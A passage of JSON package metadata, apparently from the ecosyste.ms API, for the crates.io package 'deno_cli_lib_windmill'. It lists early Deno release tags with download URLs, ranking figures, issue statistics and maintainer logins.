ad.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T09:39:12.063Z","dependent_packages_count":0,"downloads":3034,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":97.62815400232019,"dependent_repos_count":29.16183294663573,"dependent_packages_count":34.44025522041763,"stargazers_count":null,"forks_count":null,"average":53.74341405645785},"purl":"pkg:cargo/deno_cli_lib_windmill","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cli_lib_windmill","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cli_lib_windmill","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cli_lib_windmill/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_lib_windmill/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_lib_windmill/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_lib_windmill/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_lib_windmill/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_lib_windmill/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_lib_windmill/codemeta","maintainers":[{"uuid":"205717","login":"rubenfiszel","name":"Ruben 